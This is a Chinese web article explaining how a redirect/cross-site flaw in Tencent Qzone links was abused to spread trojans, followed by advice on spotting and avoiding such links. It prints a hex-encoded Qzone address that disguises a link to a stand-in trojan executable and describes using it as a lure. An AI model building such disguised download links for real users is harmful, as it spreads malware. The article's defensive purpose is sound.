腾讯Qzone地址变木马 成黑客利器
一、模拟黑客攻击
这里,我们首先来了解这个漏洞的具体情况。Qzone的跨站漏洞是网友无意中打开类似“号码?url=任意字母”时发现的,这时网页显示为一个框架网页,中间为"无法打开网页"的空白页面(如图1);然而,当输入类似“号码?url=”的地址时却可以正常显示,这时url后的网址其实在幕后是加载的。那么,Qzone的跨站漏洞又是如何被黑客作为木马的媒介的呢?
Qzone默认加载的地址要小心 |
第一步:黑客需要对该地址进行乔装改扮一番。比如:网页木马的url为""。黑客会使用URl加密技术来为木马地址作掩护,常用的方法是把url地址转换为16进制,这里以ASCII码随心换为例(如图2)进行示范。
黑客常用URL伪装器 |
第二步:黑客将Qzone的地址设置为"号码?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%75%6D%61%2E%63%6F%6D%2F%6D%75%6D%61%2E%65%78%65"并在网页上贴出Qzone的地址来引诱网友点击,用户往往点击了该地址下载运行了木马还蒙在鼓里。
二、如何防范Qzone攻击
方法1:既然这一跨站漏洞这么隐蔽,用户感染的几率也不会低。我们需要如何来防范这一漏洞可能造成的危害呢?做到不感染病毒,未雨绸缪是最有效果的。因此,我们在访问网友的Qzone前,要多长几个心眼,要观察其网址的形式。
一般正常的Qzone的地址是"号码"或者"http://号码"形式的,如果出现"号码?url="的地址就要谨慎了,Qzone也可能出现类似"号码/?url=http%3A//_%23uin%3D号码%26albumid%3D393029702%26photoid%3D"的地址,如果地址里面完全没有QQ的地址段,那么为了防止下载运行网页木马,可以将url后的字符输入到ASCII码随心换进行转换(如果是像以上地址的格式,可以将%后的十六进制字符逐个进行转换来获得完整地址),如果url指向可执行文件就不能点击了。
方法2:为了防止系统被种植网页木马,还可以安装杀毒软件和防火墙并需要开始实时文件和网络监控,这样即使下载了网页木马也会被清除。如果发现了可疑的Qzone地址要及时举报,让黑客成为过街老鼠,毫无藏身之处。
小结:Qzone的跨站漏洞被用来种植木马具有受众广的特点,Qzone的地址经过加密化装后,又有几个人会仔细地进行甄别呢?因此,利用人们偷窥人家隐私空间的好奇心来传播木马是很有效果的。
其实,要防范Qzone地址在你的电脑种植木马也不难,最简单的方法就是只点击QQ资料里的Qzone地址,不去其他网站点击就可以了。另外,需要使用具有防范IE漏洞的安全工具和杀毒软件来查杀这类木马的下载安装,如:瑞星卡卡。携带木马的Qzone地址一经发现要马上通知网友,决不姑息,不让其他人成为黑客的牺牲品。同时,每次Qzone提示升级我们也最好升级不用嫌麻烦而取消升级,以免被黑客利用其他未知的漏洞。
-
夸克网盘怎么搜索别人的分享?夸克网盘别人分享链接怎么用?
夸克网盘作为夸克上自带的网盘空间,不仅可以放自己手机里的相册,电影等信息,还可以分享资源和好友,但是很多小伙伴不清楚夸克网盘别人分享的链接下载后就可以永久保存了吗?怎么去搜索别人分享的资源呢?夸克网盘怎么搜索别人的分享?1、爱盘搜(点击进入)爱盘搜默认就是夸...
-
小鸡宝宝考考你:番石榴和石榴是同一种水果吗?
支付宝庄园小课堂10月26日的问题是,小鸡宝宝考考你:番石榴和石榴是同一种水果吗?你知道正确答案吗?跟着小编一起来详细了解吧。2023年蚂蚁庄园10月26日庄园小课堂答案今天的问题是:小鸡宝宝考考你:番石榴和石榴是同一种水果吗?答案是:并不是哦答案解析:番石榴和石榴是...
-
社保卡怎么激活?社保卡手机上激活流程
近日社保卡一定要记得激活的话题上了热搜,引起了很多人的关注,毕竟如果不激活的话,无论是医保报销,还是生育津贴、失业金、养老金等都是会受影响的,下面就一起来看看社保卡激活流程。社保卡怎么激活?1,打开支付宝APP,在首页的地方点击【市民中心】进入;2,进入之后点击【...
-
猜一猜:猫咪睡觉时,有可能像人类一样做梦吗?
支付宝庄园小课堂4月11日的问题是,猜一猜:猫咪睡觉时,有可能像人类一样做梦吗?如果你不清楚,可以看看文中的介绍。2024年蚂蚁庄园4月11日庄园小课堂答案今天的问题是:猜一猜:猫咪睡觉时,有可能像人类一样做梦吗?答案是:真有可能哦答案解析:研究表明,猫也会做梦。因为和人...